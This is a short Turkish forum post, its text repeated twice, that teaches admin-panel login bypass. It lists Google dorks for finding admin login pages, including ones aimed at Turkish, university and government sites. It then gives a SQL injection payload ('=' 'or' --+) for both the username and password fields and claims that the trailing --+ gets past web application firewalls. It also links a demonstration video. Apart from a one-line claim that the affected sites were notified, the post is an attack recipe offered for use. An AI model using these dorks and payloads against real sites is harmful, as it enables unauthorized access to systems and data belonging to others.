Bu yazımda admin panel bypass yöntemini göstereceğim
Dork Yazarak admin paneli bulabiliriz.
örnek dork: inurl:"admin.php"
dork şunu kastediyor içinde admin.php olan siteleri göster
örnek dork: inurl:"com.tr"
dork şunu kastediyor domainde com.tr olan siteleri getir.
örnek dork: inurl:"com.tr" inurl"admin.php"
iki dorku birleştirdim ve com.tr li sitelerde admin.php dosyasına sahip olan siteleri getiriyor.
Örnek Dork:
site:"edu" inurl:"admin/login" --> Üniversite sitesi admin panel dorku
site:"gov" inurl:"admin/login" --> Devlet sitesi admin panel dorku
Admin panel bypass
normal de '=' 'or' olmasına rağmen waf atlatmak için sonuna --+ ekleyerek güvenlik duvarı atlatabiliyoruz
Admin Kullanıcı Adı: '=' 'or' --+
Parola: '=' 'or' --+
Not: videodaki sitelerle iletişime geçilip açık kapatılmıştır bilginize...
ÖRNEK VİDEO
https://www.youtube.com/watch?v=n8QiuUlz9us
.
Dork Yazarak admin paneli bulabiliriz.
örnek dork: inurl:"admin.php"
dork şunu kastediyor içinde admin.php olan siteleri göster
örnek dork: inurl:"com.tr"
dork şunu kastediyor domainde com.tr olan siteleri getir.
örnek dork: inurl:"com.tr" inurl"admin.php"
iki dorku birleştirdim ve com.tr li sitelerde admin.php dosyasına sahip olan siteleri getiriyor.
Örnek Dork:
site:"edu" inurl:"admin/login" --> Üniversite sitesi admin panel dorku
site:"gov" inurl:"admin/login" --> Devlet sitesi admin panel dorku
Admin panel bypass
normal de '=' 'or' olmasına rağmen waf atlatmak için sonuna --+ ekleyerek güvenlik duvarı atlatabiliyoruz
Admin Kullanıcı Adı: '=' 'or' --+
Parola: '=' 'or' --+
Not: videodaki sitelerle iletişime geçilip açık kapatılmıştır bilginize...
ÖRNEK VİDEO
https://www.youtube.com/watch?v=n8QiuUlz9us
.
Son düzenleme: